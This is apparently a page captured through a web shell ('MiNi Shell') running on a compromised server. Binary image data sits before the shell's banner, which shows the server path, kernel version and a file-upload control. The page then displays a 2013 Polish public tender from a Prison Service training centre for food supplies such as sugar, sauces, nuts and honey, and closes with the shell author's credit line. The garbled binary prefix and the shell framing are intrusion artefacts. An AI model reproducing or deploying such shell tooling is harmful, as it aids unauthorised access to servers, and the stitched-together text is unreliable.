JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130705/263008-N-2013.html

<p class="kh_header"><b>Lubiewo: Przetarg nieograniczony na dostawy artykułów stanowiących rodzaj - różne artykuły spożywcze</b><br>
<b>Numer ogłoszenia: 263008 - 2013; data zamieszczenia: 05.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Doskonalenia Kadr Służby Więziennej w Suchej , 144, 89-526 Lubiewo, woj. kujawsko-pomorskie, tel. 0-52 3341225, faks 0-52 3341225 wew.316.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Słuzby Więziennej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawy artykułów stanowiących rodzaj - różne artykuły spożywcze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy artykułów stanowiących rodzaj - różne artykuły spożywcze.

Część I:
Lp.	Nazwa zgodna CPV	Kod z CPV	Jed.
miary	Ilość
	Nazwa własna oferowanego produktu		
1	Różne produkty spożywcze -
Bułka tarta	
158 00000-6	kg	200
2	Wyroby ciastkarskie -
Groszek ptysiowy	
158 12100-4	kg	50
3	Wyroby ciastkarskie -
Foremki z ciasta 
francuskiego	
 158 12100-4	 kg	80
4	Wyroby ciastkarskie -
Paluszki słone	
158 12100-4	kg	150
5	Wyroby ciastkarskie -
   Paluszki słone	
158 12100-4	kg	300

Część II:
Lp.	Nazwa zgodna CPV	Kod z CPV	Jed.
miary	Ilość
	Nazwa własna oferowanego produktu		
1	Sól -
Sól jodowana	158 72400-5	kg	800
2	Sól -
Sól czosnkowa	158 72400-5	kg	50
3	Sól
Sól peklowa	158 72400-5	kg	30
4	Buliony -
Bulion drobiowy	158 91500-5	kg	30
5	Mieszanki przypraw -
Fix do spaghetti	158 71270-7	kg	100
6	 Dania wegetariańskie -
Kotlety sojowe	158 94100-2	kg	50
7	Kakao -
Kakao rozpuszczalne	158 41000-5	kg	150
8	Kakao -
Kakao naturalne	158 41000-5	kg	50
9	Sosy -
Sos pieczeniowy	158 71260-4	kg	20
10	Sosy -
Sos tabasco	158 71260-4	kg	20
11	Sosy -
Sosy  sałatkowe	158 71260-4	kg	50
12	Sos sojowy	158 71210-9	kg	25
13	Zupy -
Zupa pieczarkowa	158 91400-4	kg	50
14	Zupy -
Zupa porowa	158 91400-4	kg	50
15	Zupy -
Zupa szparagowa	158 91400-4	kg	50
16	Różne produkty spożywcze -
żelatyna
	158 00000-6	kg	100
17	Różne produkty spożywcze -
Grzyby suszone
	158 00000-6	kg	50
18	drożdze	158 98000-9	kg	50
19	Galaretki owocowe	153 32240-8	kg	500
20	Cukier	158 31000-2	kg	5000
21	Cukier w kostkach	15831000-2	kg	50
22	Cukier -
Cukier puder	158 31000-2	kg	50
23	Cukier -
Cukier w saszetkach	158 31000-2	kg	50
24	Cukier -
Cukier wanilinowy	158 31000-2	kg	50
25	Różne produkty spożywcze -
Sos czekoladowy	158 00000-6 	kg	50
26	Różne produkty spożywcze -
Sos tofii	158 00000-6	kg	50
27	Różne produkty spożywcze - 
Sos ajerkoniakowy	158 00000-6	kg	50
28	Różne produkty spożywcze -
Sos truskawkowy 	158 00000-6	kg	50
29	Bita śmietana
Śmietanka w sprayu	155 12900-9	kg	200
30	Bita śmietana -
Śmietanka w proszku	155 12900-9	kg	10
31	Śmietana -
Śmietanka do kawy w płynie	155 12000-0	l	300
32	Mleko w proszku -
Śmietanka do kawy w proszku	155 11700-0	kg	800
33	Nasiona sezamu	031 11500-7	kg	50


Część III:
Lp.	Nazwa zgodna CPV	Kod z CPV	Jed.
miary	Ilość
	Nazwa własna oferowanego produktu		
1	Przetworzone orzechy 
Płatki migdałowe	153 32300-7	kg	30
2	Przetworzone orzechy
Orzechy włoskie	
011 31000-4	kg	30
3	Orzeszki ziemne	031 11200-4	kg	50
4	Owoce suszone
Śliwka suszona	
153 32410-1	kg	150
5	Rodzynki	032 22115-2	kg	150






Część IV:
Lp.	Nazwa zgodna CPV	Kod z CPV	Jed.
miary	Ilość
	Nazwa własna oferowanego produktu		
1	Ekstrakty warzywne -
Przyprawa w płynie	158 92200-9	l	600
2	Ocet lub produkty równoważne -
Ocet	
158 71770-8	l	500
3	Ocet lub produkty równoważne -
Ocet winny	
158 71770-8	l	50
4	Ketchup	158 71230-5	kg	500
5	musztarda	158 71250-1	kg	500
6	Majonez	158 71273-8	kg	800

Część V:
Lp.	Nazwa zgodna CPV	Kod z CPV	Jed.
miary	Ilość
	Nazwa własna oferowanego produktu		
1	Syropy cukrowe
Syrop wiśniowy	158 31500-7	l	550
2	Miód naturalny
	031 42100-9	kg	300
3	Miód naturalny	031 42100-9	kg	400.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. 7 SIWZ oświadczeń i dokumentów wg. formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. 7 SIWZ oświadczeń i dokumentów wg. formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. 7 SIWZ oświadczeń i dokumentów wg. formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. 7 SIWZ oświadczeń i dokumentów wg. formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. 7 SIWZ oświadczeń i dokumentów wg. formuły: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Ceny artykułów stanowiących przedmiot zamówienia na dzień podpisania umowy są określone w złożonych formularzach cenowych stanowiących załączniki do oferty i nie mogą ulec zmianie przez pierwsze 90 dni realizacji umowy i nie będą podlegały waloryzacji z wyjątkiem ustawowej zmiany podatku VAT. Po 90 dniach od rozpoczęcia realizacji umowy dopuszczalna jest zmiana cen jednostkowych, nie częściej niż jeden raz w kwartale o współczynnik inflacji GUS za kwartał poprzedzający kwartał, w którym dokonywana jest zmiana cen jednostkowych.
2.	Zmiana cen, o których mowa w § 5 ust. 1 może nastąpić na zasadach określonych w § 8 ust. 1  umowy.
3. Zamawiający ma prawo odstąpić od umowy na podstawie art. 145 ust. 1 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Doskonalenia Kadr Służby Więziennej w Suchej, Sucha 144, 89-526 Lubiewo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2013 godzina 12:00, miejsce: Ośrodek Doskonalenia Kadr Służby Więziennej w Suchej, Sucha 144, 89-526 Lubiewo
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Różne produkty spozywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa zgodna CPV	Kod z CPV	Jed.
miary	Ilość
	Nazwa własna oferowanego produktu		
1	Różne produkty spożywcze -
Bułka tarta	
158 00000-6	kg	200
2	Wyroby ciastkarskie -
Groszek ptysiowy	
158 12100-4	kg	50
3	Wyroby ciastkarskie -
Foremki z ciasta 
francuskiego	
 158 12100-4	 kg	80
4	Wyroby ciastkarskie -
Paluszki słone	
158 12100-4	kg	150
5	Wyroby ciastkarskie -
   Paluszki słone	
158 12100-4	kg	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> sół, sosy, cukier.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa zgodna CPV	Kod z CPV	Jed.
miary	Ilość
	Nazwa własna oferowanego produktu		
1	Sól -
Sól jodowana	158 72400-5	kg	800
2	Sól -
Sól czosnkowa	158 72400-5	kg	50
3	Sól
Sól peklowa	158 72400-5	kg	30
4	Buliony -
Bulion drobiowy	158 91500-5	kg	30
5	Mieszanki przypraw -
Fix do spaghetti	158 71270-7	kg	100
6	 Dania wegetariańskie -
Kotlety sojowe	158 94100-2	kg	50
7	Kakao -
Kakao rozpuszczalne	158 41000-5	kg	150
8	Kakao -
Kakao naturalne	158 41000-5	kg	50
9	Sosy -
Sos pieczeniowy	158 71260-4	kg	20
10	Sosy -
Sos tabasco	158 71260-4	kg	20
11	Sosy -
Sosy  sałatkowe	158 71260-4	kg	50
12	Sos sojowy	158 71210-9	kg	25
13	Zupy -
Zupa pieczarkowa	158 91400-4	kg	50
14	Zupy -
Zupa porowa	158 91400-4	kg	50
15	Zupy -
Zupa szparagowa	158 91400-4	kg	50
16	Różne produkty spożywcze -
żelatyna
	158 00000-6	kg	100
17	Różne produkty spożywcze -
Grzyby suszone
	158 00000-6	kg	50
18	drożdze	158 98000-9	kg	50
19	Galaretki owocowe	153 32240-8	kg	500
20	Cukier	158 31000-2	kg	5000
21	Cukier w kostkach	15831000-2	kg	50
22	Cukier -
Cukier puder	158 31000-2	kg	50
23	Cukier -
Cukier w saszetkach	158 31000-2	kg	50
24	Cukier -
Cukier wanilinowy	158 31000-2	kg	50
25	Różne produkty spożywcze -
Sos czekoladowy	158 00000-6 	kg	50
26	Różne produkty spożywcze -
Sos tofii	158 00000-6	kg	50
27	Różne produkty spożywcze - 
Sos ajerkoniakowy	158 00000-6	kg	50
28	Różne produkty spożywcze -
Sos truskawkowy 	158 00000-6	kg	50
29	Bita śmietana
Śmietanka w sprayu	155 12900-9	kg	200
30	Bita śmietana -
Śmietanka w proszku	155 12900-9	kg	10
31	Śmietana -
Śmietanka do kawy w płynie	155 12000-0	l	300
32	Mleko w proszku -
Śmietanka do kawy w proszku	155 11700-0	kg	800
33	Nasiona sezamu	031 11500-7	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.24.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przetworzone orzechy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa zgodna CPV	Kod z CPV	Jed.
miary	Ilość
	Nazwa własna oferowanego produktu		
1	Przetworzone orzechy 
Płatki migdałowe	153 32300-7	kg	30
2	Przetworzone orzechy
Orzechy włoskie	
011 31000-4	kg	30
3	Orzeszki ziemne	031 11200-4	kg	50
4	Owoce suszone
Śliwka suszona	
153 32410-1	kg	150
5	Rodzynki	032 22115-2	kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.23.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Ekstrakty warzywne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa zgodna CPV	Kod z CPV	Jed.
miary	Ilość
	Nazwa własna oferowanego produktu		
1	Ekstrakty warzywne -
Przyprawa w płynie	158 92200-9	l	600
2	Ocet lub produkty równoważne -
Ocet	
158 71770-8	l	500
3	Ocet lub produkty równoważne -
Ocet winny	
158 71770-8	l	50
4	Ketchup	158 71230-5	kg	500
5	musztarda	158 71250-1	kg	500
6	Majonez	158 71273-8	kg	800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Syropy cukrowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa zgodna CPV	Kod z CPV	Jed.
miary	Ilość
	Nazwa własna oferowanego produktu		
1	Syropy cukrowe
Syrop wiśniowy	158 31500-7	l	550
2	Miód naturalny
	031 42100-9	kg	300
3	Miód naturalny	031 42100-9	kg	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.15.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com